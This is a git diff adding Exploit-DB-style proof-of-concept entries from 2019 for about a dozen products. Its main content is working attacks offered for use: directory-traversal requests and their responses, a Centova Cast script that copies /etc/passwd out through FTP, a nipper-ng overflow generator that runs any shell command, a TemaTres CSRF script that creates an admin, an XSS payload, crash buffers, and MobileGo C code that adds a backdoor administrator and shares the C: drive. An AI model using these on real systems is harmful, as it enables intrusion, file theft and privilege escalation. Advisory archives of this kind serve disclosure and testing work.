diff --git a/exploits/asp/webapps/47666.txt b/exploits/asp/webapps/47666.txt
new file mode 100644
index 000000000..8eeca7b5f
--- /dev/null
+++ b/exploits/asp/webapps/47666.txt
@@ -0,0 +1,27 @@
+# Title: Crystal Live HTTP Server 6.01 - Directory Traversal
+# Date of found: 2019-11-17
+# Author: Numan Türle
+# Vendor Homepage: https://www.genivia.com/
+# Version : Crystal Quality 6.01.x.x
+# Software Link : https://www.crystalrs.com/crystal-quality-introduction/
+
+
+POC
+---------
+GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1
+Host: 12.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+Response
+---------
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47663.txt b/exploits/hardware/webapps/47663.txt
new file mode 100644
index 000000000..bda1fe705
--- /dev/null
+++ b/exploits/hardware/webapps/47663.txt
@@ -0,0 +1,142 @@
+# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
+# Google Dork: N/A​
+# Date: 2019​-11-15
+# Exploit Author: Kevin Randall​
+# Vendor Homepage: https://www.lexmark.com/en_us.html​
+# Software Link: https://www.lexmark.com/en_us.html​
+# Version: 2.27.4.0.39 (Latest Version)​
+# Tested on: Windows Server 2012​
+# CVE : N/A
+​
+​
+Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.​
+​
+Timeline:​
+Discovered on: 9/24/2019​
+Vendor Notified: 9/24/2019​
+Vendor Confirmed Receipt of Vulnerability: 9/24/2019​
+Follow up with Vendor: 9/25/2019​
+Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019​
+Vendor Confirmed Vulnerability is Valid: 9/26/2019​
+Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019​
+Vendor Confirmed Signoff to Disclose: 9/27/2019​
+Final Email Sent: 9/27/2019​
+Public Disclosure: 11/15/2019​
+​
+PoC:​
+​
+GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1​
+TE: deflate,gzip;q=0.3​
+Connection: TE, close​
+Host: 10.200.15.70:2070​
+User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20​
+​
+HTTP/1.0 200 OK​
+Server: rXpress​
+Content-Length: 848536​
+​
+​
+.​
+.​
+.​
+.[.P.e.r.f.l.i.b.].​
+.​
+.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.​
+.​
+.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.​
+.​
+.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.​
+.​
+.​
+.​
+.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].​
+.​
+.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.​
+.​
+.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.​
+.​
+.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.​
+.​
+.L.a.s.t. .H.e.l.p.=.5.0.4.1.​
+.​
+.​
+.​
+.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].​
+.​
+.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.​
+​
+​
+GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1​
+TE: deflate,gzip;q=0.3​
+Connection: TE, close​
+Host: 10.200.15.70:2070​
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3​
+​
+HTTP/1.0 200 OK​
+Server: rXpress​
+Content-Length: 38710​
+​
+..[.S.t.r.i.n.g.s.].​
+.​
+.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".​
+.​
+.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".​
+.​
+.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".​
+.​
+.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".​
+.​
+.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".​
+.​
+.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".​
+.​
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".​
+.​
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
+.​
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".​
+.​
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
+.​
+.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".​
+​
+​
+​
+​
+GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1​
+TE: deflate,gzip;q=0.3​
+Connection: TE, close​
+Host: 10.200.15.70:2070​
+User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)​
+​
+HTTP/1.0 200 OK​
+Server: rXpress​
+Content-Length: 17463​
+​
+# Copyright (c) 1993-2004 Microsoft Corp.​
+#​
+# This file contains port numbers for well-known services defined by IANA​
+#​
+# Format:​
+#​
+# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]​
+#​
+​
+echo                7/tcp​
+echo                7/udp​
+discard             9/tcp    sink null​
+discard             9/udp    sink null​
+systat             11/tcp    users                  #Active users​
+systat             11/udp    users                  #Active users​
+daytime            13/tcp​
+daytime            13/udp​
+qotd               17/tcp    quote                  #Quote of the day​
+qotd               17/udp    quote                  #Quote of the day​
+chargen            19/tcp    ttytst source          #Character generator​
+chargen            19/udp    ttytst source          #Character generator​
+ftp-data           20/tcp                           #FTP, data​
+ftp                21/tcp                           #FTP. control​
+ssh                22/tcp                           #SSH Remote Login Protocol​
+telnet             23/tcp​
+smtp               25/tcp    mail                   #Simple Mail Transfer Protocol​
+time               37/tcp    timserver
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47669.sh b/exploits/hardware/webapps/47669.sh
new file mode 100755
index 000000000..ec4a7de3b
--- /dev/null
+++ b/exploits/hardware/webapps/47669.sh
@@ -0,0 +1,29 @@
+# Exploit Title: Centova Cast 3.2.11 - Arbitrary File Download
+# Date: 2019-11-17
+# Exploit Author: DroidU
+# Vendor Homepage: https://centova.com
+# Affected Version: <=v3.2.11
+# Tested on: Debian 9, CentOS 7
+
+#!/bin/bash
+if [ "$4" = "" ]
+then
+echo "Usage: $0 centovacast_url user password ftpaddress"
+exit
+fi
+url=$1
+user=$2
+pass=$3
+ftpaddress=$4
+
+dwn() {
+curl -s -k "$url/api.php?xm=server.copyfile&f=json&a\[username\]=$user&a\[password\]=$pass&a\[sourcefile\]=$1&a\[destfile\]=1.tmp"
+wget -q "ftp://$user:$pass@$ftpaddress/1.tmp" -O $2
+}
+
+dwn /etc/passwd passwd
+echo "
+
+/etc/passwd:
+"
+cat passwd
\ No newline at end of file
diff --git a/exploits/ios/dos/47665.py b/exploits/ios/dos/47665.py
new file mode 100755
index 000000000..3b5aa423d
--- /dev/null
+++ b/exploits/ios/dos/47665.py
@@ -0,0 +1,28 @@
+# Exploit Title: Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-11-16
+# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
+# Software Link: App Store for iOS devices
+# GE Intelligent Platforms, Inc.
+# Tested Version: 5.0.0.25920
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 13.2
+
+# Steps to Produce the Crash:
+# 1.- Run python code: Open_Proficy_HMI-SCADA_for_iOS_5.0.0.25920.py
+# 2.- Copy content to clipboard
+# 3.- Open "Open Proficy HMI-SCADA for iOS"
+# 4.- Host List > "+"
+# 5.- Add Host
+# 6.- Address Type "IP Address"
+# 7.- Host IP Address "192.168.1.1"
+# 8.- User Name "l4m5"
+# 9.- Paste ClipBoard on "Password"
+# 10.- Add
+# 11.- Connect
+# 12.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 2500
+print (buffer)
\ No newline at end of file
diff --git a/exploits/linux/remote/47673.py b/exploits/linux/remote/47673.py
new file mode 100755
index 000000000..ba279f3ea
--- /dev/null
+++ b/exploits/linux/remote/47673.py
@@ -0,0 +1,100 @@
+# Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)
+# Date: 2019-10-20
+# Exploit Author: Guy Levin
+# https://blog.vastart.dev
+# Vendor Homepage: https://tools.kali.org/reporting-tools/nipper-ng
+# Software Link: https://code.google.com/archive/p/nipper-ng/source/default/source
+# Version:  0.11.10
+# Tested on: Debian
+# CVE : CVE-2019-17424
+
+"""
+    Exploit generator created by Guy Levin (@va_start - twitter.com/va_start)
+    Vulnerability found by Guy Levin (@va_start - twitter.com/va_start)
+
+    For a detailed writeup of CVE-2019-17424 and the exploit building process, read my blog post
+    https://blog.vastart.dev/2019/10/stack-overflow-cve-2019-17424.html
+
+    may need to run nipper-ng with enviroment variable LD_BIND_NOW=1 on ceratin systems
+"""
+
+import sys
+import struct
+
+def pack_dword(i):
+    return struct.pack("<I", i)
+
+def prepare_shell_command(shell_command):
+    return shell_command.replace(" ", "${IFS}")
+
+def build_exploit(shell_command):
+    EXPLOIT_SKELETON = r"privilage exec level 1 " \
+                        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " \
+                        "aasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab " \
+                        "kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca " \
+                        "acdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaac " \
+                        "uaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadma " \
+                        "adnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaae " \
+                        "faaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewa " \
+                        "aexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaaf " \
+                        "paafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaagha " \
+                        "agiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaag " \
+                        "zaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahra " \
+                        "ahaaaataahuaahvaahwaahpaaaaaaazaaibaaicaaidaaieaaifaaigaaihaaiiaaijaai " \
+                        "kaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajca " \
+                        "ajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaaj"
+
+    WRITEABLE_BUFFER = 0x080FA001
+    CALL_TO_SYSTEM = 0x0804E870
+    COMMAND_BUFFER = 0x080FA015 
+
+    OFFSET_FOR_WRITEABLE_BUFFER = 0x326
+    OFFSET_FOR_RETURN = 0x33a
+    OFFSET_FOR_COMMAND_BUFFER = 0x33e
+    
+    OFFSET_FOR_SHELL_COMMAND = 0x2a
+    MAX_SHELL_COMMAND_CHARS = 48
+
+    target_values_at_offsets = {
+        WRITEABLE_BUFFER : OFFSET_FOR_WRITEABLE_BUFFER, 
+        CALL_TO_SYSTEM : OFFSET_FOR_RETURN, 
+        COMMAND_BUFFER : OFFSET_FOR_COMMAND_BUFFER
+        }
+
+    exploit = bytearray(EXPLOIT_SKELETON, "ascii")
+    
+    # copy pointers
+    for target_value, target_offset in target_values_at_offsets.items():
+        target_value = pack_dword(target_value)
+        exploit[target_offset:target_offset+len(target_value)] = target_value
+
+    # copy payload
+    if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
+        raise ValueError("shell command is too big")
+    shell_command = prepare_shell_command(shell_command)
+    if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
+        raise ValueError("shell command is too big after replacing spaces")
+
+    # adding padding to end of shell command
+    for i, letter in enumerate(shell_command + "&&"):
+        exploit[OFFSET_FOR_SHELL_COMMAND+i] = ord(letter)
+
+    return exploit
+
+def main():
+    if len(sys.argv) != 3:
+        print(f"usage: {sys.argv[0]} <shell command to execute> <output file>")
+        return 1
+
+    try:
+        payload = build_exploit(sys.argv[1])
+    except Exception as e:
+        print(f"error building exploit: {e}")
+        return 1
+
+    open(sys.argv[2], "wb").write(payload)
+
+    return 0 # success
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/47670.txt b/exploits/php/webapps/47670.txt
new file mode 100644
index 000000000..31ed0c49f
--- /dev/null
+++ b/exploits/php/webapps/47670.txt
@@ -0,0 +1,74 @@
+# Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery (Add Admin)
+# Author: Pablo Santiago
+# Date: 2019-11-14
+# Vendor Homepage: https://www.vocabularyserver.com/
+# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
+# Version: 3.0
+# CVE : 2019–14345
+# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
+# Tested on: Windows 10
+
+# Description:
+# Web application for management formal representations of knowledge,
+# thesauri, taxonomies and multilingual vocabularies / Aplicación para
+# la gestión de representaciones formales del conocimiento, tesauros,
+# taxonomías, vocabularios multilingües.
+
+#Exploit
+
+import requests
+import sys
+
+session = requests.Session()
+
+http_proxy = “http://127.0.0.1:8080"
+https_proxy = “https://127.0.0.1:8080"
+
+proxyDict = {
+“http” : http_proxy,
+“https” : https_proxy
+}
+
+url = ‘http://localhost/tematres/vocab/login.php'
+values = {‘id_correo_electronico’: ‘pablo@tematres.com’,
+‘id_password’: ‘admin’,
+‘task’:’login’}
+
+r = session.post(url, data=values, proxies=proxyDict)
+cookie = session.cookies.get_dict()[‘PHPSESSID’]
+
+print (cookie)
+
+host = sys.argv[1]
+user = input(‘[+]User:’)
+lastname = input(‘[+]lastname:’)
+password = input(‘[+]Password:’)
+password2 = input(‘[+]Confirm Password:’)
+email = input(‘[+]Email:’)
+
+if (password == password2):
+#configure proxy burp
+
+data = {
+‘_nombre’:user,
+‘_apellido’:lastname,
+‘_correo_electronico’:email,
+‘orga’:’bypassed’,
+‘_clave’:password,
+‘_confirmar_clave’:password2,
+‘isAdmin’:1,
+‘boton’:’Guardar’,
+‘userTask’:’A’,
+‘useactua’:’’
+
+}
+headers= {
+‘Cookie’: ‘PHPSESSID=’+cookie
+}
+request = session.post(host+’/tematres/vocab/admin.php’, data=data,
+headers=headers, proxies=proxyDict)
+print(‘+ — — — — — — — — — — — — — — — — — — — — — — — — — +’)
+print(‘Status Code:’+ str(request.status_code))
+
+else:
+print (‘Passwords dont match!!!’)
\ No newline at end of file
diff --git a/exploits/php/webapps/47672.txt b/exploits/php/webapps/47672.txt
new file mode 100644
index 000000000..a3e43c9c3
--- /dev/null
+++ b/exploits/php/webapps/47672.txt
@@ -0,0 +1,30 @@
+# Exploit Title: TemaTres 3.0 - 'value' Persistent Cross-site Scripting
+# Author: Pablo Santiago
+# Date: 2019-11-14
+# Vendor Homepage: https://www.vocabularyserver.com/
+# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
+# Version: 3.0
+# CVE : 2019–14343
+# Reference: https://medium.com/@Pablo0xSantiago/cve-2019-14343-ebc120800053
+# Tested on: Windows 10
+
+#Description:
+The parameter "value" its vulnerable to Stored Cross-site scripting..
+
+#Payload: “><script>alert(“XSS”)<%2fscript>
+
+POST /tematres3.0/vocab/admin.php?vocabulario_id=list HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0)
+Gecko/20100101 Firefox/66.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/tematres3.0/vocab/admin.php?vocabulario_id=list
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 44
+Connection: close
+Cookie: PHPSESSID=uejtn72aavg5eit9sc9bnr2jse
+Upgrade-Insecure-Requests: 1
+
+doAdmin=&valueid=&value=12vlpcv%22%3e%3cscript%3ealert(%22XSS%22)%3c%2fscript%3edx6e1&alias=ACX&orden=2
\ No newline at end of file
diff --git a/exploits/windows/dos/47662.txt b/exploits/windows/dos/47662.txt
new file mode 100644
index 000000000..9cea980df
--- /dev/null
+++ b/exploits/windows/dos/47662.txt
@@ -0,0 +1,37 @@
+# Exploit Title: iSmartViewPro 1.3.34 - Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2019 -11-16
+# Vendor Homepage: http://www.smarteyegroup.com/
+# Software Link: https://apps.apple.com/mx/app/ismartviewpro/id834791071
+# Tested Version: 1.3.34
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 6s - iOS 13.2
+
+##############################################################################################################################################
+
+Summary: This app is specially built for P2P IP camera series. thanks to unique P2P connection technology that users are able to watch live 
+video on iPhone from any purchased IP camera by simply enter camera's ID and password; no complex IP or router settings. The app have a lot of
+functions, such as local record video, set ftp params, set email, set motion alarm and so on.
+
+##############################################################################################################################################
+
+Steps to Produce the Crash:
+
+   1.- Run python code: iSmartViewPro.py
+   2.- Copy content to clipboard
+   3.- Open App "iSmartViewPro"
+   4.- Go to "Add Camera"
+   5.- go to "Add network cameras"
+   6.- Paste ClipBoard on "Camara DID"
+   7.- Paste ClipBoard on "Password"
+   8.- Next
+   9.- Crashed
+
+##############################################################################################################################################
+
+Python "iSmartViewPro" Code:
+
+   buffer = "\x41" * 257
+   print (buffer)
+
+##############################################################################################################################################
\ No newline at end of file
diff --git a/exploits/windows/dos/47671.py b/exploits/windows/dos/47671.py
new file mode 100755
index 000000000..6604f92bb
--- /dev/null
+++ b/exploits/windows/dos/47671.py
@@ -0,0 +1,23 @@
+# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
+# Author: chuyreds
+# Discovery Date: 2019-11-16
+# Vendor Homepage: https://www.foscam.es/
+# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
+# Tested Version: 1.1.4.9
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python foscam-vms-uid-dos.py
+# 2.- Open FoscamVMS1.1.4.9.txt and copy its content to clipboard
+# 3.- Open FoscamVMS
+# 4.- Go to Add Device
+# 5.- Choose device type "NVR"/"IPC"
+# 6.- Copy the content of the file into Username
+# 7.- Click on Login Check
+# 8.- Crashed
+ 
+buffer = "\x41" * 520
+f = open ("FoscamVMS_1.1.4.9.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/47661.txt b/exploits/windows/local/47661.txt
new file mode 100644
index 000000000..eb48cecd0
--- /dev/null
+++ b/exploits/windows/local/47661.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-11-17
+# Vendor Homepage: https://www.emerson.com/en-us
+# Software Link : https://www.opertek.com/descargar-software/?prc=_326
+# Tested Version: 9.70 Build 8595
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FxControlRuntime" |findstr /i /v """
+
+FxControl Runtime	FxControlRuntime	C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe	Auto
+
+# Service info:
+
+C:\>sc qc FxControlRuntime
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: FxControlRuntime
+        TYPE               : 120  WIN32_SHARE_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : FxControl Runtime
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/47664.txt b/exploits/windows/local/47664.txt
new file mode 100644
index 000000000..992edb18f
--- /dev/null
+++ b/exploits/windows/local/47664.txt
@@ -0,0 +1,31 @@
+# Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path
+# Date: 2019-11-16
+# Exploit Author : Olimpia Saucedo
+# Vendor Homepage: www.asus.com
+# Version:  1.00.31
+# Tested on: Windows 10 Pro x64  (but it should works on all windows version)
+ 
+The application suffers from an unquoted service path issue impacting the service 'ASUS HM Com Service (aaHMSvc.exe)' related to the Asus Motherboard Utilities.
+This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.
+ 
+POC:
+
+>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+ASUS HM Com Service      asHmComSvc
+C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
+Auto
+
+>sc qc "asHMComSvc"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: asHMComSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ASUS HM Com Service
+        DEPENDENCIES       : RpcSs
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47667.txt b/exploits/windows/local/47667.txt
new file mode 100644
index 000000000..e85cbef83
--- /dev/null
+++ b/exploits/windows/local/47667.txt
@@ -0,0 +1,102 @@
+# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions
+# Exploit Author: ZwX
+# Exploit Date: 2019-11-15
+# Vendor Homepage : https://www.wondershare.net/
+# Software Link: https://www.wondershare.net/mobilego/
+# Tested on OS: Windows 7 
+
+
+# Proof of Concept (PoC):
+==========================
+C:\Program Files\Wondershare\MobileGo>icacls *.exe
+adb.exe Everyone:(I)(F)
+        AUTORITE NT\Système:(I)(F)
+        BUILTIN\Administrateurs:(I)(F)
+        BUILTIN\Utilisateurs:(I)(RX)
+
+APKInstaller.exe Everyone:(I)(F)
+        AUTORITE NT\Système:(I)(F)
+        BUILTIN\Administrateurs:(I)(F)
+        BUILTIN\Utilisateurs:(I)(RX)
+
+BsSndRpt.exe Everyone:(I)(F)
+             AUTORITE NT\Système:(I)(F)
+             BUILTIN\Administrateurs:(I)(F)
+             BUILTIN\Utilisateurs:(I)(RX)
+
+DriverInstall.exe Everyone:(I)(F)
+                  AUTORITE NT\Système:(I)(F)
+                  BUILTIN\Administrateurs:(I)(F)
+                  BUILTIN\Utilisateurs:(I)(RX)
+
+fastboot.exe Everyone:(I)(F)
+             AUTORITE NT\Système:(I)(F)
+             BUILTIN\Administrateurs:(I)(F)
+             BUILTIN\Utilisateurs:(I)(RX)
+
+FetchDriver.exe Everyone:(I)(F)
+                AUTORITE NT\Système:(I)(F)
+                BUILTIN\Administrateurs:(I)(F)
+                BUILTIN\Utilisateurs:(I)(RX)
+
+MGNotification.exe Everyone:(I)(F)
+                   AUTORITE NT\Système:(I)(F)
+                   BUILTIN\Administrateurs:(I)(F)
+                   BUILTIN\Utilisateurs:(I)(RX)
+
+MobileGo.exe Everyone:(I)(F)
+             AUTORITE NT\Système:(I)(F)
+             BUILTIN\Administrateurs:(I)(F)
+             BUILTIN\Utilisateurs:(I)(RX)
+
+MobileGoService.exe Everyone:(I)(F)
+                    AUTORITE NT\Système:(I)(F)
+                    BUILTIN\Administrateurs:(I)(F)
+                    BUILTIN\Utilisateurs:(I)(RX)
+
+unins000.exe Everyone:(I)(F)
+             AUTORITE NT\Système:(I)(F)
+             BUILTIN\Administrateurs:(I)(F)
+             BUILTIN\Utilisateurs:(I)(RX)
+
+URLReqService.exe Everyone:(I)(F)
+                  AUTORITE NT\Système:(I)(F)
+                  BUILTIN\Administrateurs:(I)(F)
+                  BUILTIN\Utilisateurs:(I)(RX)
+
+WAFSetup.exe Everyone:(I)(F)
+             AUTORITE NT\Système:(I)(F)
+             BUILTIN\Administrateurs:(I)(F)
+             BUILTIN\Utilisateurs:(I)(RX)
+
+WsConverter.exe Everyone:(I)(F)
+                AUTORITE NT\Système:(I)(F)
+                BUILTIN\Administrateurs:(I)(F)
+                BUILTIN\Utilisateurs:(I)(RX)
+
+WsMediaInfo.exe Everyone:(I)(F)
+                AUTORITE NT\Système:(I)(F)
+                BUILTIN\Administrateurs:(I)(F)
+                BUILTIN\Utilisateurs:(I)(RX)
+				
+				
+				
+#Exploit code(s): 
+=================
+
+1) Compile below 'C' code name it as "MobileGo.exe"
+
+#include<windows.h>
+
+int main(void){
+ system("net user hacker abc123 /add");
+ system("net localgroup Administrators hacker  /add");
+ system("net share SHARE_NAME=c:\ /grant:hacker,full");
+ WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0);
+return 0;
+} 
+
+2) Rename original "MobileGo.exe" to "~MobileGo.exe"
+3) Place our malicious "MobileGo.exe" in the MobileGo directory
+4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE. 
+Privilege Successful Escalation
\ No newline at end of file
diff --git a/exploits/windows/local/47668.txt b/exploits/windows/local/47668.txt
new file mode 100644
index 000000000..e04634888
--- /dev/null
+++ b/exploits/windows/local/47668.txt
@@ -0,0 +1,85 @@
+# Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths
+# Date: 2019-11-17
+# Exploit Author: Akif Mohamed Ik
+# Vendor Homepage: http://software.ncp-e.com/
+# Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/
+# Version: 9.2x
+# Tested on: Windows 7 SP1
+# CVE : NA
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+ncprwsnt                                                        ncprwsnt
+                C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
+                           Auto
+rwsrsu                                                          rwsrsu
+                C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
+                           Auto
+ncpclcfg                                                        ncpclcfg
+                C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
+                           Auto
+NcpSec                                                          NcpSec
+                C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
+                           Auto
+						   
+C:\Users\ADMIN>sc qc ncprwsnt					   
+[SC] QueryServiceConfig SUCCESS	
+		SERVICE_NAME: ncprwsnt
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ncprwsnt
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\ADMIN>sc qc rwsrsu
+[SC] QueryServiceConfig SUCCESS
+
+        SERVICE_NAME       : rwsrsu
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
